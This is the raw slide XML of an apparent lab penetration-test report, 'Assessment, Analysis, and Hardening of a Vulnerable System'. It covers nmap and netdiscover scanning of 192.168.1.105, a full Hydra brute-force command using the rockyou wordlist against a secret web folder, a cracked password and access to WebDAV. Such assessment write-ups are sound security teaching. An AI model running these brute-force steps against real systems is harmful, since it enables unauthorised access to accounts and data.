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30"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="283" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="279" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="281" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="282"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9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId31"/>
      <p:bold r:id="rId32"/>
      <p:italic r:id="rId33"/>
      <p:boldItalic r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="020F03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40C459-057F-4FCB-AB8C-C222AC24DD2E}">
  <a:tblStyle styleId="{2440C459-057F-4FCB-AB8C-C222AC24DD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643"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="124" d="100"/>
          <a:sy n="124" d="100"/>
        </p:scale>
        <p:origin x="176" y="752"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="2232"/>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320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73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597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551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8671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4705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1.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nvd.nist.gov/vuln/detail/CVE-2019-6579"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nvd.nist.gov/vuln/detail/CVE-2019-13386" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/cve/CVE-2007-045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nvd.nist.gov/vuln/detail/CVE-2021-31783" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.ne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nvd.nist.gov/vuln/detail/CVE-2020-24227" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-5437" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/548.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dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Prepared by Joshua Ling</a:t>
            </a:r>
            <a:endParaRPr sz="3100" dirty="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123874"/>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Open Web Port (80) CVE-2019-6579</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19763" y="1476252"/>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I used nmap to scan for open ports on the target machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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Commands use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>~# netdiscover –r 192.168.1.255/16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" i="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b="1" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>~# nmap –sV 192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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b="1" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>~# nmap –sS –A 192.168.1.105 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" b="1" i="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Webserver:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meet_our_team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" i="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39050" y="1421383"/>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100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>256 IP addresses were scanned by nmap. There are 4 hosts up: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Port 22 and 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>are open. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en"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100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The discovered files on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meet_our_team/ashton.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en"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100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The ashton.txt allowed the discovery of the secret folder at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/secret folder</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1"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4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C24642-A8D8-7A8B-EB16-8C0BD7DD9BB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210824" y="1490432"/>
            <a:ext cx="2779003" cy="772312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB4C3F33-1D39-332B-1D41-9C0A7B387B4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219849" y="2307305"/>
            <a:ext cx="2779003" cy="241813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90678" y="-140616"/>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Open Web Port (80) CVE-2019-6579 - (Continued)</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39050" y="1421383"/>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endParaRPr lang="en-US"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AU"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AU" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>After nmaping, we can navigate to the webserver – 192.168.1.105. The screenshot shown is the webserver homepage, displaying company folders. There is a existence of a secret folder which needed to be accessed after reading through the files located on the webserver. </a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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FA5D040C-E548-77E9-A3E1-CE26E55F03D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396782" y="1480526"/>
            <a:ext cx="2803955" cy="2668616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E40A4BC-4657-4019-2FC8-DBD471A5D171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396782" y="4011632"/>
            <a:ext cx="2803955" cy="520954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC38E3D7-73A6-2FED-72E5-D27949931C51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="734029"/>
            <a:ext cx="4383218" cy="1091061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7937704F-CC5C-20A6-55CD-64FFD25C0C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5944088" y="2678214"/>
            <a:ext cx="2828587" cy="1103437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3181384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Brute-force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142966" y="4758601"/>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sz="2000" b="1" dirty="0"/>
              <a:t>Hydra Command:</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" dirty="0"/>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672765" y="1480575"/>
            <a:ext cx="2504681"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AU" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used Hydra which is already preinstalled on Kali Linux and I need to have the password list ready, the name of it is rockyou.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" b="1" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>$ hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret-folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Note: A hash of Ryan’s password was found</a:t>
            </a:r>
            <a:endParaRPr sz="11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2"/>
            <a:ext cx="533372" cy="533481"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695452"/>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57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AU"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AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Password for Ashton was tested against the common password dictionary “rockyou”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access to the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access to /webdav system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ryan’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>password.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> was found: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>linux4u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
